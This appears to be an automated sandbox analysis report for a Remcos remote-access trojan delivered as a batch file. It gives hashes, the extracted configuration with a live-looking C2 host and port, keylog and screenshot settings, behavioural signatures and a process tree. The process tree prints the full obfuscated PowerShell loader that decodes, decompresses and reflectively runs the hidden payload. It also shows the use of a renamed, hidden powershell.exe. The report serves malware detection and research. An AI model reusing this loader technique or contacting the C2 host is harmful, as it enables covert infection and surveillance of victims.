Analysis

  • max time kernel
    38s
  • max time network
    39s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-12-2024 16:55

General

  • Target

    Vuupkzeyx.bat

  • Size

    1.7MB

  • MD5

    cc0e4b5bdfc8fea0703e0e1f2342c915

  • SHA1

    d14c623ce04289e2a4024381c2e99c9ff20a84cc

  • SHA256

    12ea5712edf3120754d3f1ce995f46bf855a4eb47ed0830a574068a584fae628

  • SHA512

    3182d67031dbc35395adf93d6ec3dc5b6cdbcb286f87242ba2bb54090a82f80a2247a277fe6c1d050cd3ac5cb00e1330681e1a89d9887249e498cf6da351b771

  • SSDEEP

    24576:hKvkZKBxfTCRFcjanaAKbySo1RfOIPC2ZH5yLJgQiL44e/b4fPh9y0qV5mPRswMD:svo2pJa9Ow50dmbMmCiw

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

24.ip.gl.ply.gg:7694

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4QV34V

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\system32\chcp.com
          chcp 65001
          3⤵
            PID:420
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:4808
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau
              3⤵
                PID:1856
              • C:\Windows\system32\attrib.exe
                attrib +s +h C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau
                3⤵
                • Sets file to hidden
                • Views/modifies file attributes
                PID:1320
              • C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau
                C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau -WindowStyle hidden -command "$Eshlfusgtgb = get-content 'C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat' | Select-Object -Last 1; $Kgebqo = [System.Convert]::FromBase64String($Eshlfusgtgb);$Gvjqxfpp = New-Object System.IO.MemoryStream( , $Kgebqo );$Cycjrzzlzy = New-Object System.IO.MemoryStream;$Bibxmqhypv = New-Object System.IO.Compression.GzipStream $Gvjqxfpp, ([IO.Compression.CompressionMode]::Decompress);$Bibxmqhypv.CopyTo( $Cycjrzzlzy );$Bibxmqhypv.Close();$Gvjqxfpp.Close();[byte[]] $Kgebqo = $Cycjrzzlzy.ToArray();[Array]::Reverse($Kgebqo); $Jiasfyokxtu = [System.Threading.Thread]::GetDomain().Load($Kgebqo); $Viwsypp = $Jiasfyokxtu.EntryPoint; $Viwsypp.DeclaringType.InvokeMember($Viwsypp.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                3⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops startup file
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3172
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              2⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4516
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\uijjzom.vbs"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2876

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau

            Filesize

            425KB

            MD5

            6bb54b2d7a3d63578559239a79700ea3

            SHA1

            bc8d22b16e9ab2045c3acfb8ff1c0ce97bd9936a

            SHA256

            870eda04ea71cc066ec907f005e1d05ce592f04799c60e600e2cb986dc85b5eb

            SHA512

            5eb2369b6d5cf615d9ef49315ef2278db7cf9a9fe2deb3c2568ff114d51dbd1a9ca4e4ab696e0bf6e2c5d9e3e2c84c706cd550824f3b45b3f7df1690503a4614

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e1kjgjcf.sbs.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\uijjzom.vbs

            Filesize

            382B

            MD5

            3db952c728fab3baa68a61db75d074c8

            SHA1

            67f61b864fe60acee701cea9cb65469395ff8f30

            SHA256

            b1860633c96be2e60353cf76801c6ea53df1761af69383337b297487748a044b

            SHA512

            a1046e6de280772b293d7f4bb1afd2729d0f435265591ed3e3861607ab8366176e3d53b1a1b628d1adaa396475d6612ea8531ee593198e9ac99d1f5d5bbecea1

          • memory/3172-1-0x000000007490E000-0x000000007490F000-memory.dmp

            Filesize

            4KB

          • memory/3172-2-0x00000000029A0000-0x00000000029D6000-memory.dmp

            Filesize

            216KB

          • memory/3172-3-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-4-0x0000000005350000-0x0000000005A1A000-memory.dmp

            Filesize

            6.8MB

          • memory/3172-5-0x00000000050D0000-0x00000000050F2000-memory.dmp

            Filesize

            136KB

          • memory/3172-6-0x0000000005170000-0x00000000051D6000-memory.dmp

            Filesize

            408KB

          • memory/3172-7-0x0000000005250000-0x00000000052B6000-memory.dmp

            Filesize

            408KB

          • memory/3172-17-0x0000000005C20000-0x0000000005F77000-memory.dmp

            Filesize

            3.3MB

          • memory/3172-18-0x0000000006020000-0x000000000603E000-memory.dmp

            Filesize

            120KB

          • memory/3172-19-0x0000000006070000-0x00000000060BC000-memory.dmp

            Filesize

            304KB

          • memory/3172-20-0x00000000071F0000-0x0000000007286000-memory.dmp

            Filesize

            600KB

          • memory/3172-21-0x0000000006580000-0x000000000659A000-memory.dmp

            Filesize

            104KB

          • memory/3172-22-0x00000000065D0000-0x00000000065F2000-memory.dmp

            Filesize

            136KB

          • memory/3172-23-0x0000000007890000-0x0000000007E36000-memory.dmp

            Filesize

            5.6MB

          • memory/3172-24-0x00000000084C0000-0x0000000008B3A000-memory.dmp

            Filesize

            6.5MB

          • memory/3172-25-0x00000000073B0000-0x000000000751A000-memory.dmp

            Filesize

            1.4MB

          • memory/3172-26-0x00000000075C0000-0x0000000007652000-memory.dmp

            Filesize

            584KB

          • memory/3172-27-0x0000000007590000-0x000000000759A000-memory.dmp

            Filesize

            40KB

          • memory/3172-28-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-29-0x0000000007E40000-0x0000000007F68000-memory.dmp

            Filesize

            1.2MB

          • memory/3172-30-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-43-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-45-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-89-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-73-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-71-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-69-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-67-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-65-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-63-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-61-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-59-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-57-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-55-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-53-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-52-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-49-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-47-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-75-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-41-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-39-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-37-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-35-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-33-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-31-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-93-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-92-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-87-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-85-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-83-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-81-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-79-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-77-0x0000000007E40000-0x0000000007F61000-memory.dmp

            Filesize

            1.1MB

          • memory/3172-1206-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1208-0x0000000007F70000-0x0000000007FBC000-memory.dmp

            Filesize

            304KB

          • memory/3172-1207-0x00000000077D0000-0x0000000007868000-memory.dmp

            Filesize

            608KB

          • memory/3172-1211-0x0000000008010000-0x0000000008064000-memory.dmp

            Filesize

            336KB

          • memory/3172-1213-0x000000007490E000-0x000000007490F000-memory.dmp

            Filesize

            4KB

          • memory/3172-1212-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1215-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1216-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1222-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1223-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1227-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1232-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1234-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1229-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1239-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1247-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-1258-0x0000000003153000-0x0000000003154000-memory.dmp

            Filesize

            4KB

          • memory/3172-1257-0x00000000030F3000-0x00000000030F4000-memory.dmp

            Filesize

            4KB

          • memory/3172-1256-0x00000000030C2000-0x00000000030C3000-memory.dmp

            Filesize

            4KB

          • memory/3172-1255-0x000000000303C000-0x000000000303D000-memory.dmp

            Filesize

            4KB

          • memory/3172-1254-0x0000000002FF4000-0x0000000002FF5000-memory.dmp

            Filesize

            4KB

          • memory/3172-1253-0x0000000002F7E000-0x0000000002F7F000-memory.dmp

            Filesize

            4KB

          • memory/3172-1252-0x0000000002EF7000-0x0000000002EF8000-memory.dmp

            Filesize

            4KB

          • memory/3172-1251-0x000000000319C000-0x000000000319D000-memory.dmp

            Filesize

            4KB

          • memory/3172-1248-0x0000000074900000-0x00000000750B1000-memory.dmp

            Filesize

            7.7MB

          • memory/4516-1250-0x0000000000400000-0x000000000047F000-memory.dmp

            Filesize

            508KB

          • memory/4516-1268-0x0000000000400000-0x000000000047F000-memory.dmp

            Filesize

            508KB

          • memory/4516-1285-0x0000000000400000-0x000000000047F000-memory.dmp

            Filesize

            508KB